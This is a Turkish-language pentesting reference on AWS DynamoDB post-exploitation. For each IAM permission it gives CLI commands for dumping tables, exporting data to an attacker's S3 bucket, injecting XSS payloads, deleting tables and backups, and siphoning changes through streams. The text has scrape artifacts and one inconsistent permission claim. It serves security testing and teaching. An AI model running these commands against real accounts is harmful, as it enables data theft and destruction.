AWS - DynamoDB Post Exploitation

DynamoDB

Daha fazla bilgi için kontrol edin:

dynamodb:BatchGetItem

Bu izinlere sahip bir saldırgan, birincil anahtar ile tabloların içinden öğeleri alabilecektir (tablonun tüm verilerini isteyemezsiniz). Bu, birincil anahtarları bilmeniz gerektiği anlamına gelir (bunu tablo meta verilerini alarak (describe-table) öğrenebilirsiniz).

aws dynamodb batch-get-item --request-items file:///tmp/a.json

// With a.json
{
"ProductCatalog" : { // This is the table name
"Keys": [
{
"Id" : { // Primary keys name
"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
}
}
]
}
}

aws dynamodb batch-get-item \
--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
--region <region>

Olası Etki: Tablo içinde hassas bilgilerin bulunmasıyla dolaylı yetki yükseltme

dynamodb:GetItem

Önceki izinlere benzer bu izin, potansiyel bir saldırganın, alınacak girişin birincil anahtarı verildiğinde yalnızca 1 tablodan değerleri okumasına olanak tanır:

aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json

// With a.json
{
"Id" : {
"N": "205"
}
}

Bu izinle transact-get-items yöntemini şu şekilde kullanmak da mümkündür:

aws dynamodb transact-get-items \
--transact-items file:///tmp/a.json

// With a.json
[
{
"Get": {
"Key": {
"Id": {"N": "205"}
},
"TableName": "ProductCatalog"
}
}
]

Potansiyel Etki: Tablo içinde hassas bilgilerin bulunmasıyla dolaylı yetki yükseltme

dynamodb:Query

Önceki izinlere benzer bu izin, potansiyel bir saldırganın, alınacak girişin birincil anahtarını vererek yalnızca 1 tablodan değerleri okumasına olanak tanır. Karşılaştırmaların bir alt kümesini kullanmaya izin verir, ancak birincil anahtar ile izin verilen tek karşılaştırma (görünmesi gereken) "EQ" olduğundan, bir istekte tüm veritabanını almak için bir karşılaştırma kullanamazsınız.

aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json

// With a.json
{
"Id" : {
"ComparisonOperator":"EQ",
"AttributeValueList": [ {"N": "205"} ]
}
}

aws dynamodb query \
--table-name TargetTable \
--key-condition-expression "AttributeName = :value" \
--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
--region <region>

Olası Etki: Tablo içinde hassas bilgileri bulma yoluyla dolaylı yetki yükseltme

dynamodb:Scan

Bu izni kullanarak tüm tabloyu kolayca dökebilirsiniz.

aws dynamodb scan --table-name <t_name> #Get data inside the table

Olası Etki: Tablo içinde hassas bilgileri bulma yoluyla dolaylı yetki yükseltme

dynamodb:PartiQLSelect

Bu izni kullanarak tüm tabloyu kolayca dökebilirsiniz.

aws dynamodb execute-statement \
--statement "SELECT * FROM ProductCatalog"

Bu izin, batch-execute-statement gibi işlemleri gerçekleştirmeye de olanak tanır:

aws dynamodb batch-execute-statement \
--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'

ama bir değerle birincil anahtarı belirtmeniz gerekiyor, bu yüzden çok faydalı değil.

Olası Etki: Tablo içinde hassas bilgileri bulma yoluyla dolaylı yetki yükseltme

dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)

Bu izin, bir saldırgana tüm tabloyu seçtiği bir S3 kovasına dışa aktarma izni verecektir:

aws dynamodb export-table-to-point-in-time \
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>

Not edin ki bunun çalışması için tablonun zamanında geri yükleme özelliği etkin olmalıdır, tablonun bunu yapıp yapmadığını kontrol edebilirsiniz:

aws dynamodb describe-continuous-backups \
--table-name <tablename>

Eğer etkin değilse, etkinleştirmeniz gerekecek ve bunun için dynamodb:ExportTableToPointInTime iznine ihtiyacınız var:

aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true

Potansiyel Etki: Tablo içinde hassas bilgilerin bulunmasıyla dolaylı yetki yükseltme

dynamodb:CreateTable, dynamodb:RestoreTableFromBackup, (dynamodb:CreateBackup)

Bu izinlerle, bir saldırgan bir yedekten yeni bir tablo oluşturma (veya hatta bir yedek oluşturup bunu farklı bir tabloda geri yükleme) yeteneğine sahip olacaktır. Ardından, gerekli izinlere sahip olduğunda, üretim tablosunda artık bulunmayan bilgileri yedeklerden kontrol edebilecektir.

aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>

Olası Etki: Tablo yedeğinde hassas bilgilerin bulunmasıyla dolaylı yetki yükseltme

dynamodb:PutItem

Bu izin, kullanıcıların tabloya yeni bir öğe eklemesine veya mevcut bir öğeyi yeni bir öğe ile değiştirmesine olanak tanır. Aynı birincil anahtara sahip bir öğe zaten varsa, tüm öğe yeni öğe ile değiştirilecektir. Eğer birincil anahtar mevcut değilse, belirtilen birincil anahtara sahip yeni bir öğe oluşturulacaktır.

## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S":  "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}

aws dynamodb put-item \
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>

Olası Etki: DynamoDB tablosunda veri ekleyip/şekillendirebilme yeteneği ile daha fazla zafiyet/atlatma istismarları

dynamodb:UpdateItem

Bu izin, kullanıcıların bir öğenin mevcut niteliklerini değiştirmesine veya bir öğeye yeni nitelikler eklemesine olanak tanır. Bu, tüm öğeyi değiştirmez; yalnızca belirtilen nitelikleri günceller. Eğer birincil anahtar tabloda yoksa, işlem belirtilen birincil anahtara sahip yeni bir öğe oluşturur ve güncelleme ifadesinde belirtilen nitelikleri ayarlar.

## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
}

aws dynamodb update-item \
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>

Olası Etki: DynamoDB tablosunda veri ekleyip/değiştirerek daha fazla zafiyet/atlatma istismar etme

dynamodb:DeleteTable

Bu izne sahip bir saldırgan bir DynamoDB tablosunu silebilir, bu da veri kaybına neden olur.

aws dynamodb delete-table \
--table-name TargetTable \
--region <region>

Potansiyel etki: Silinen tabloya bağlı hizmetlerde veri kaybı ve kesinti.

dynamodb:DeleteBackup

Bu izne sahip bir saldırgan, bir DynamoDB yedeğini silebilir, bu da bir felaket kurtarma senaryosunda veri kaybına neden olabilir.

aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>

Potansiyel etki: Veri kaybı ve bir felaket kurtarma senaryosunda bir yedekten geri yükleme yapamama.

dynamodb:StreamSpecification, dynamodb:UpdateTable, dynamodb:DescribeStream, dynamodb:GetShardIterator, dynamodb:GetRecords

Bu izinlere sahip bir saldırgan, bir DynamoDB tablosunda bir akışı etkinleştirebilir, tabloyu güncelleyerek değişiklikleri akıtmaya başlayabilir ve ardından tabloya yapılan değişiklikleri gerçek zamanlı olarak izlemek için akışı erişebilir. Bu, saldırgana veri değişikliklerini izleme ve dışarıya aktarma imkanı tanır, bu da veri sızıntısına yol açabilir.

1. Bir DynamoDB tablosunda bir akışı etkinleştir:

bashCopy codeaws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>

1. ARN ve diğer detayları elde etmek için akışı tanımlayın:

bashCopy codeaws dynamodb describe-stream \
--table-name TargetTable \
--region <region>

1. Akış ARN'sini kullanarak shard iterator'ı alın:

bashCopy codeaws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>

1. Akıştan veri erişmek ve dışa aktarmak için shard iterator'ü kullanın:

bashCopy codeaws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>

Potansiyel etki: DynamoDB tablosundaki değişikliklerin gerçek zamanlı izlenmesi ve veri sızıntısı.